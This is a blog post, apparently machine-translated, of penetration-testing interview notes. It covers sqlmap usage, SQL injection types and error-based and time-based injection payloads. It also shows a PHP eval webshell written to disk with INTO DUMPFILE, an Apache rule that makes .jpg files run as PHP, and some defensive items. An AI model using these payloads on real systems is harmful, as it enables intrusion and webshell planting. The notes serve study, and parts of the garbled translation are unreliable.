Knowledge points related to penetration testing, such as sqlmap injection nmap scanning mode, sql injection type sql injection protection method, etc.

First, sqlmap, how to inject an injection point?

1) If it is a get model, directly, sqlmap-u "such as dot web site".
2) If it is a post type such as point, the parameters of sqlmap-u "injection point address" -- data="post" can be used.“
3) If it is cookie, X-Forwarded-For and so on, when it is accessible, use burpsuite to grab the package, replace the injection with * number, put it in the file, and then sqlmap-r "file address"

Second, nmap, several ways of scanning

Reference 1:

Reference 2:

3. How many types of sql injection?

1) Error injection
 2) bool injection
 3) Delayed injection
 4) Wide byte injection

Fourthly, what are the functions of error injection? 10

1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))]]]----------------
2)adopt floor Downward rectification of errors
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10).exp()select * from test where id=1 and exp(~(select * from(select user())a));

Fifth, how to judge delayed injection?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)

Sixth, what are the similarities between blind injection and delayed injection?

The judgment of one character and one character

Seven, how to get a web shell of a website?

Upload, background edit template, sql injection write file, command execution, code execution,
Some exploded vulnerabilities of cms, such as dedecms background can directly create script files, wordpress upload plug-in includes zip compressed script files, etc.

Eighth, what functions do sql injection and write files have?

select 'In a word' into outfile 'Route'
select 'In a word' into dumpfile 'Route'
select '<?php eval($_POST[1]) ?>' into dumpfile  'd:\\wwwroot\\nvhack.php';

Ninth, how to prevent CSRF?

1. Verify referer
 2. Verify token

10. What are the owasp vulnerabilities?

1. SQL Injection Protection Method:
2. Invalidated Identity Authentication and Session Management
 3. Cross-site script attack XSS
 4. Direct reference to unsafe objects
 5. Security Configuration Error
 6. Leakage of sensitive information
 7. Lack of Functional Access Control
 8. Cross-Station Request Forgery CSRF
 9. Use components with known vulnerabilities
 10. Unverified redirection and forwarding

Eleven: SQL Injection Protection Method?

1. Use a Safe API
 2. Escape Escape Escape for Special Characters Input
 3. Use whitelist to standardize input verification methods
 4. Controlling client input, not allowing SQL input related special characters
 5. Before submitting the database for SQL query, the server filters, escapes, replaces and deletes special characters.

Twelve, what are the functions of code execution, file reading and command execution?

1,Code execution: eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
2,File reading: file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()etc.
3,Command execution: system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

Thirteen, do img tags have other ways to get administrator paths besides onerror attributes?

src specifies a remote script file to get referer

Fourteenth, in addition to onerror attribute, the img tag, and the suffix name of src attribute, must end with. jpg, how to get the administrator path.

1,Remote Server Modification apache Configuration file, configuration.jpg Documents php Ways of parsing
AddType application/x-httpd-php .jpg
<img src= > will be parsed in php

Tags: SQL PHP Attribute ascii

Posted on Tue, 03 Sep 2019 03:18:37 -0400 by musson